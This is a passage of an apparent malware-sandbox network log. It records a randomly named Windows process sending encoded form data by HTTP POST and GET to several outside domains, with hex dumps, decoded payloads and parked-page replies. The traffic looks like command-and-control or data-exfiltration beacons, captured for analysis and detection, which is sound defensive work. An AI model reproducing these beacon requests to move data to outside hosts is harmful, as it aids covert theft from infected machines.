76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.12	49740	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:42.127465010 CEST	715	OUT	POST /rydx/ HTTP/1.1 Host: www.drdavidglassman.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.drdavidglassman.com Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.drdavidglassman.com/rydx/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 2f 48 34 47 45 58 37 71 4c 45 4b 64 51 46 6a 56 45 53 59 38 48 71 38 56 42 61 74 32 57 75 49 65 6d 4b 52 78 53 63 31 36 79 61 39 61 2b 31 61 6e 6f 59 6a 50 79 58 50 66 59 2b 73 43 4e 61 45 69 39 30 66 7a 30 49 7a 6d 4a 66 36 38 75 79 79 32 65 68 69 6a 6f 66 4c 6c 72 51 41 4a 5a 5a 35 72 6f 6b 64 6e 56 4d 79 6b 67 51 50 71 78 4a 71 70 65 4b 6c 53 56 33 38 33 79 30 68 30 75 62 38 74 51 4c 51 45 6c 51 62 6f 46 38 59 66 30 54 57 45 6f 2b 65 54 43 6a 74 50 79 38 41 77 2f 6d 6e 47 72 64 69 54 6d 6c 71 30 63 6d 6c 77 4e 4e 65 34 55 45 54 61 7a 32 4e 63 35 4b 38 51 35 7a 62 69 41 67 3d 3d Data Ascii: VlEHDVvh=/H4GEX7qLEKdQFjVESY8Hq8VBat2WuIemKRxSc16ya9a+1anoYjPyXPfY+sCNaEi90fz0IzmJf68uyy2ehijofLlrQAJZZ5rokdnVMykgQPqxJqpeKlSV383y0h0ub8tQLQElQboF8Yf0TWEo+eTCjtPy8Aw/mnGrdiTmlq0cmlwNNe4UETaz2Nc5K8Q5zbiAg==
May 27, 2024 12:21:42.589638948 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:42 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 1a0aee7d-0a27-4f07-85e3-6658c44e6ed0 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QUhkRpg+unYzlWfmxIMX+rZR1yH9yO9f+9DTHjB7ObP2dmzQDR3fp1i5p0u/k/9tmH6B+aa2ZYqsdDhbeQ1i9w== set-cookie: parking_session=1a0aee7d-0a27-4f07-85e3-6658c44e6ed0; expires=Mon, 27 May 2024 10:36:42 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 55 68 6b 52 70 67 2b 75 6e 59 7a 6c 57 66 6d 78 49 4d 58 2b 72 5a 52 31 79 48 39 79 4f 39 66 2b 39 44 54 48 6a 42 37 4f 62 50 32 64 6d 7a 51 44 52 33 66 70 31 69 35 70 30 75 2f 6b 2f 39 74 6d 48 36 42 2b 61 61 32 5a 59 71 73 64 44 68 62 65 51 31 69 39 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QUhkRpg+unYzlWfmxIMX+rZR1yH9yO9f+9DTHjB7ObP2dmzQDR3fp1i5p0u/k/9tmH6B+aa2ZYqsdDhbeQ1i9w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:42.589668989 CEST	595	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWEwYWVlN2QtMGEyNy00ZjA3LTg1ZTMtNjY1OGM0NGU2ZWQwIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.12	49741	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:44.660775900 CEST	735	OUT	POST /rydx/ HTTP/1.1 Host: www.drdavidglassman.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.drdavidglassman.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.drdavidglassman.com/rydx/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 2f 48 34 47 45 58 37 71 4c 45 4b 64 51 6c 54 56 49 52 41 38 51 61 38 57 63 71 74 32 66 4f 4a 5a 6d 4b 64 78 53 64 68 55 79 6f 70 61 2b 55 71 6e 70 61 4c 50 7a 58 50 66 4e 4f 73 4e 4a 61 46 75 39 30 54 64 30 49 2f 6d 4a 62 71 38 75 7a 75 32 64 51 69 73 35 66 4b 44 6a 77 41 4c 58 35 35 72 6f 6b 64 6e 56 50 50 2f 67 51 33 71 78 36 69 70 66 72 6c 52 5a 58 38 30 34 55 68 30 35 72 38 54 51 4c 52 70 6c 55 43 44 46 2b 77 66 30 54 6d 45 6f 76 65 51 49 6a 74 7a 32 38 42 48 78 44 4b 2b 72 4d 36 68 6d 32 61 4c 54 45 6f 55 4d 4c 50 69 4c 32 62 4d 6d 31 5a 52 30 64 46 67 30 77 6d 72 62 69 76 77 73 4b 6f 38 6a 67 32 39 50 45 50 66 63 41 78 57 67 6b 55 3d Data Ascii: VlEHDVvh=/H4GEX7qLEKdQlTVIRA8Qa8Wcqt2fOJZmKdxSdhUyopa+UqnpaLPzXPfNOsNJaFu90Td0I/mJbq8uzu2dQis5fKDjwALX55rokdnVPP/gQ3qx6ipfrlRZX804Uh05r8TQLRplUCDF+wf0TmEoveQIjtz28BHxDK+rM6hm2aLTEoUMLPiL2bMm1ZR0dFg0wmrbivwsKo8jg29PEPfcAxWgkU=
May 27, 2024 12:21:45.151304960 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:44 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 43072abf-8803-4ddf-8c61-f8f07de75a40 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QUhkRpg+unYzlWfmxIMX+rZR1yH9yO9f+9DTHjB7ObP2dmzQDR3fp1i5p0u/k/9tmH6B+aa2ZYqsdDhbeQ1i9w== set-cookie: parking_session=43072abf-8803-4ddf-8c61-f8f07de75a40; expires=Mon, 27 May 2024 10:36:45 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 55 68 6b 52 70 67 2b 75 6e 59 7a 6c 57 66 6d 78 49 4d 58 2b 72 5a 52 31 79 48 39 79 4f 39 66 2b 39 44 54 48 6a 42 37 4f 62 50 32 64 6d 7a 51 44 52 33 66 70 31 69 35 70 30 75 2f 6b 2f 39 74 6d 48 36 42 2b 61 61 32 5a 59 71 73 64 44 68 62 65 51 31 69 39 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QUhkRpg+unYzlWfmxIMX+rZR1yH9yO9f+9DTHjB7ObP2dmzQDR3fp1i5p0u/k/9tmH6B+aa2ZYqsdDhbeQ1i9w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:45.151329994 CEST	595	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDMwNzJhYmYtODgwMy00ZGRmLThjNjEtZjhmMDdkZTc1YTQwIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.12	49742	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:47.203047037 CEST	1748	OUT	POST /rydx/ HTTP/1.1 Host: www.drdavidglassman.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.drdavidglassman.com Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.drdavidglassman.com/rydx/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 2f 48 34 47 45 58 37 71 4c 45 4b 64 51 6c 54 56 49 52 41 38 51 61 38 57 63 71 74 32 66 4f 4a 5a 6d 4b 64 78 53 64 68 55 79 6f 52 61 2f 6d 79 6e 70 38 44 50 68 6e 50 66 4d 4f 73 4f 4a 61 45 30 39 30 37 5a 30 49 44 32 4a 5a 69 38 38 42 6d 32 59 69 4b 73 67 50 4b 44 68 77 41 49 5a 5a 35 2b 6f 6b 74 6a 56 4d 33 2f 67 51 33 71 78 39 53 70 59 36 6c 52 62 58 38 33 79 30 68 6f 75 62 39 2b 51 4c 4a 58 6c 55 4f 31 46 4f 51 66 7a 33 4b 45 37 74 6d 51 45 6a 74 4c 78 38 42 66 78 44 4f 68 72 4d 58 61 6d 33 2b 68 54 48 49 55 50 4f 71 47 57 53 76 7a 36 6a 42 52 79 2f 42 55 73 79 79 77 56 56 33 35 71 73 64 65 78 54 57 4f 56 33 6d 53 4f 31 68 44 31 78 56 46 4e 65 2b 49 57 6e 50 4e 73 44 4c 54 72 59 4f 64 56 7a 4f 2f 52 6c 4f 6b 72 4d 58 59 36 7a 76 38 46 65 4b 61 79 75 74 37 6a 71 75 62 4e 6b 6d 34 70 2f 51 41 6f 2f 5a 2f 6f 72 4f 6d 58 49 32 55 79 62 78 6b 6d 54 55 48 44 47 30 7a 35 47 77 49 5a 4c 4a 62 53 6a 2b 74 30 36 66 64 62 4d 57 5a 4e 73 68 2f 31 4d 44 79 68 46 32 51 39 2b 6d 64 63 [TRUNCATED] Data Ascii: VlEHDVvh=/H4GEX7qLEKdQlTVIRA8Qa8Wcqt2fOJZmKdxSdhUyoRa/mynp8DPhnPfMOsOJaE0907Z0ID2JZi88Bm2YiKsgPKDhwAIZZ5+oktjVM3/gQ3qx9SpY6lRbX83y0houb9+QLJXlUO1FOQfz3KE7tmQEjtLx8BfxDOhrMXam3+hTHIUPOqGWSvz6jBRy/BUsyywVV35qsdexTWOV3mSO1hD1xVFNe+IWnPNsDLTrYOdVzO/RlOkrMXY6zv8FeKayut7jqubNkm4p/QAo/Z/orOmXI2UybxkmTUHDG0z5GwIZLJbSj+t06fdbMWZNsh/1MDyhF2Q9+mdcwzwxCpQRh/RXpZF1/vnf4NiNpA3X1OlvpoJDqwm1jFaE6YlilnT978CZZSbO+MU3iYy3YnUKwzi+dQyEfmVFwHkQ6ghu1uq78YpXXLqigZ5LCP3jcLgpNjCG6m7yvizXvIX8ZAiSVpLeX1hQatDAfQztyp1CTOKf84OByHK1XTRkOuiBjf38y4HZSX0I5irW270qdomoj9shoWvRjhDCzei7sxVHH2fZVzvUKb6d7MiStSJRvaMqMcAQWUXU8HOKXZZjgPmfGtP2cRVc3U6xThsEKBWTbOahhY3mhkT2t+w8CyN1Yq9OYsGY6/uZFNp1/eERJHj9GX3gJLN623Gmu3XEpRJmnMxh1UQ5CBA1M43tBJXOcZy4FjxPFLYHre4V/8VUEa5UqTQmrcEZV3dR9Wyka8Emn7rGMpXI3SnT5UhnFA86XK6VwDY3TWIYITOBlRrC+LOhwiKbyvmTcrLuGaGFSR5mXRbkohU7qq3OBBBT/gcrrYx9zCauVuPnZidptbv75m0QaPNM8r02MnfEdjDKgI1b9xNhUNFRosiiU8JE60UKqtUIckkSwP3+HQ0RN2ryxMXfcLX5x/nDZ1y3ERE7I6cXIgvslXmN5hb1SIkadG9iuIiHWq3llGJvxs8HIN6c1t+MEYoZRkE+xXXCW+S7M46g36UnKa [TRUNCATED]
May 27, 2024 12:21:47.664019108 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:47 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 351054ec-9382-4066-b032-c3f2c7b921c2 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QUhkRpg+unYzlWfmxIMX+rZR1yH9yO9f+9DTHjB7ObP2dmzQDR3fp1i5p0u/k/9tmH6B+aa2ZYqsdDhbeQ1i9w== set-cookie: parking_session=351054ec-9382-4066-b032-c3f2c7b921c2; expires=Mon, 27 May 2024 10:36:47 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 55 68 6b 52 70 67 2b 75 6e 59 7a 6c 57 66 6d 78 49 4d 58 2b 72 5a 52 31 79 48 39 79 4f 39 66 2b 39 44 54 48 6a 42 37 4f 62 50 32 64 6d 7a 51 44 52 33 66 70 31 69 35 70 30 75 2f 6b 2f 39 74 6d 48 36 42 2b 61 61 32 5a 59 71 73 64 44 68 62 65 51 31 69 39 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QUhkRpg+unYzlWfmxIMX+rZR1yH9yO9f+9DTHjB7ObP2dmzQDR3fp1i5p0u/k/9tmH6B+aa2ZYqsdDhbeQ1i9w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:47.664160967 CEST	595	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzUxMDU0ZWMtOTM4Mi00MDY2LWIwMzItYzNmMmM3YjkyMWMyIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.12	49743	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:49.733951092 CEST	431	OUT	GET /rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt HTTP/1.1 Host: www.drdavidglassman.com Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:21:50.197623014 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:50 GMT content-type: text/html; charset=utf-8 content-length: 1470 x-request-id: 584de523-3668-4b39-ae9b-74740bf45e63 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_STVLim6ysZRKDMM8dQf/ROS3hkM/oMvPUNJ9qBZ7g0zVEFpJIQipsn40VTsV0QwcBz+oLBg9ogt2nxhimepUiA== set-cookie: parking_session=584de523-3668-4b39-ae9b-74740bf45e63; expires=Mon, 27 May 2024 10:36:50 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 53 54 56 4c 69 6d 36 79 73 5a 52 4b 44 4d 4d 38 64 51 66 2f 52 4f 53 33 68 6b 4d 2f 6f 4d 76 50 55 4e 4a 39 71 42 5a 37 67 30 7a 56 45 46 70 4a 49 51 69 70 73 6e 34 30 56 54 73 56 30 51 77 63 42 7a 2b 6f 4c 42 67 39 6f 67 74 32 6e 78 68 69 6d 65 70 55 69 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_STVLim6ysZRKDMM8dQf/ROS3hkM/oMvPUNJ9qBZ7g0zVEFpJIQipsn40VTsV0QwcBz+oLBg9ogt2nxhimepUiA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:50.197640896 CEST	923	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg0ZGU1MjMtMzY2OC00YjM5LWFlOWItNzQ3NDBiZjQ1ZTYzIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.12	49744	136.143.186.12	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:55.489101887 CEST	718	OUT	POST /uyud/ HTTP/1.1 Host: www.topscaleservices.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.topscaleservices.com Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.topscaleservices.com/uyud/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 58 36 72 4f 56 74 6b 62 53 4e 62 66 61 58 56 66 4c 73 78 56 50 4d 42 58 53 35 78 42 35 78 7a 53 6d 31 61 62 67 62 6a 2b 52 68 55 74 76 50 69 78 68 4d 4c 56 79 57 51 74 74 57 6f 4b 31 46 68 71 42 52 45 4e 38 6d 4c 4c 32 37 6d 41 72 39 59 47 34 59 72 45 45 69 4d 51 4b 64 76 4e 38 30 79 55 50 47 53 79 2f 4f 43 33 49 4f 31 63 6d 58 6a 5a 53 78 6e 45 6b 70 49 44 70 77 69 37 49 7a 50 6c 53 46 55 78 32 33 69 7a 67 36 38 51 65 57 73 4f 56 51 61 47 6d 70 6a 34 68 67 36 70 52 30 78 61 4f 6e 4f 74 71 6b 52 65 57 34 7a 4f 57 41 47 39 62 30 6d 59 45 33 39 4e 6d 48 73 79 75 76 6b 55 2f 41 3d 3d Data Ascii: VlEHDVvh=X6rOVtkbSNbfaXVfLsxVPMBXS5xB5xzSm1abgbj+RhUtvPixhMLVyWQttWoK1FhqBREN8mLL27mAr9YG4YrEEiMQKdvN80yUPGSy/OC3IO1cmXjZSxnEkpIDpwi7IzPlSFUx23izg68QeWsOVQaGmpj4hg6pR0xaOnOtqkReW4zOWAG9b0mYE39NmHsyuvkU/A==
